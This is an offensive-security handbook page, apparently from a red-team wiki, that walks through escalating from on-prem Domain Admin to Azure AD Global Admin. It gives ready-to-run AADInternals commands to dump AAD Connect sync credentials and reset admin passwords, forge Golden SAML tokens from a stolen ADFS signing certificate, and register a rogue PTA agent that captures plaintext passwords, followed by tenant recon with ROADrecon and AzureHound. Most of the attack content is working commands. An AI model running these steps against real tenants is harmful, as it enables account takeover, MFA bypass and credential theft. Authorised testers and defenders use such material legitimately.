Handbook

Paths to GA

Updated 29 Sept 2026Services✎ Suggest a change
On this page

What It Is

Once Domain Admin is achieved, the next objective in hybrid AD/Azure AD environments is often Global Admin in Azure AD/Entra ID. Several sync and federation components bridge on-prem AD to Azure AD, abusing them lets a DA pivot into full control of the cloud tenant without ever touching an Azure AD credential directly.

Another reference is available here: Privesc to Global Admin Cheatsheet

Attack Flow

plain text
DA on-prem → identify AAD Connect / ADFS / PTA infrastructure
→ extract sync account creds OR forge SAML tokens OR hijack PTA agent
→ authenticate to Azure AD as Global Admin / any user
→ recon tenant with ROADtools/AzureHound

Path 1 - Azure AD Connect / AAD Connect Sync Account Abuse

What It Is

The AAD Connect server holds a sync account (MSOL_* or similar) with Directory Synchronization Accounts rights in Azure AD, enough to reset the password of any cloud user, including Global Admins, unless protected by PIM/MFA.

bash
# Identify the AAD Connect server — usually named ADSync, AADConnect, or similar
nxc smb 10.10.10.0/24 -u <username> -p <password> --shares | grep -i sync

# On the AAD Connect server (once local admin/DA), dump the sync account credentials
# AADInternals is the standard tool for this — run from PowerShell on the target
Import-Module AADInternals
Get-AADIntSyncCredentials
plain text
# Returns:
# MSOL_xxxxxxxxxxxx account name
# Plaintext password for the sync account
powershell
# Authenticate to Azure AD as the sync account
Connect-MsolService -Credential (Get-Credential)

# Or with AADInternals directly
Get-AADIntAccessTokenForAADGraph -Credentials $creds

What the Sync Account Can Do

RightImpact
Reset password of any cloud-only userTake over Global Admin account directly
Reset password of any hybrid user (limited)Escalate to synced Global Admin accounts
Read full directoryFull tenant recon
powershell
# Reset target user's password using compromised sync account (AADInternals)
Set-AADIntUserPassword -AccessToken $token -UserPrincipalName '<admin>@<tenant>.onmicrosoft.com' -Password '<newpassword>'

Path 2 - Golden SAML (ADFS)

What It Is

If the environment uses ADFS for federation, extracting the ADFS token-signing certificate lets an attacker forge SAML tokens for any user in the federated domain, including Global Admins, without ever touching Azure AD authentication.

powershell
# On the ADFS server (requires DA / local admin), extract the token-signing certificate
Import-Module AADInternals
Export-AADIntADFSSigningCertificate

# Also extract encryption certificate if needed
Export-AADIntADFSEncryptionCertificate
powershell
# Forge a SAML token impersonating a target user
$token = New-AADIntSAMLToken `
    -ImmutableID '<user-immutable-id>' `
    -PfxFileName 'ADFSSigningCertificate.pfx' `
    -PfxPassword ''  `
    -Issuer 'http://<adfs-server>/adfs/services/trust'

# Use forged token to get an Azure AD access token
Get-AADIntAccessTokenForAADGraph -SAMLToken $token

Path 3 - Pass-Through Authentication (PTA) Agent Registration

What It Is

If the tenant uses PTA instead of password hash sync, an attacker with DA can register a rogue PTA agent on any domain-joined machine. The rogue agent intercepts every authentication request sent through it, meaning it sees plaintext passwords for any user who logs into Azure AD, and can also approve logins as any user without knowing their password.

powershell
# Register a new (rogue) PTA agent using compromised Global Admin/sync creds
Import-Module AADInternals
Set-AADIntPTASpy -Path C:\PTASpy
Register-AADIntPTAAgent -Credentials $creds -MachineName '<rogue-agent-name>'
powershell
# Start intercepting/authenticating as any user
Start-AADIntPTASpy

# Review captured plaintext credentials
Get-AADIntPTASpyLogs

Recon Once You Have Cloud Access

ROADrecon / ROADtools

bash
# Authenticate — device code flow (works around some Conditional Access policies)
roadrecon auth -u '<user>@<tenant>.onmicrosoft.com' -p '<password>'

# Or with a stolen token
roadrecon auth --access-token '<token>'

# Gather full tenant data
roadrecon gather

# Launch the GUI for browsing users, groups, apps, roles
roadrecon gui
bash
# Query directly from the database
roadrecon plugin -h        # list available analysis plugins

AzureHound (BloodHound for Azure)

bash
# Collect Azure AD data — feeds into BloodHound the same as on-prem AD
azurehound -u '<user>@<tenant>.onmicrosoft.com' -p '<password>' -t '<tenant-id>' list -o azure_data.json

# Import azure_data.json into BloodHound alongside on-prem data
# Run: Find Shortest Paths to Global Admins

Locating Global Admins

bash
# Via ROADrecon — dump directory role assignments
roadrecon dump -o roadrecon_dump

grep -i "Global Administrator" roadrecon_dump/*

# Via Microsoft Graph / az cli, if authenticated
az ad signed-in-user list-owned-objects

az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles" \
    | jq '.value[] | select(.displayName=="Global Administrator")'

# List members of the Global Administrator role
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"

What Each Path Gives You

PathOutcome
AAD Connect sync accountReset any cloud user password, including GA
Golden SAML (ADFS)Forge tokens for any federated user, bypass MFA entirely
Rogue PTA agentCapture plaintext creds, approve logins as any user
ROADrecon/AzureHoundFull tenant map, identify GA members and paths to them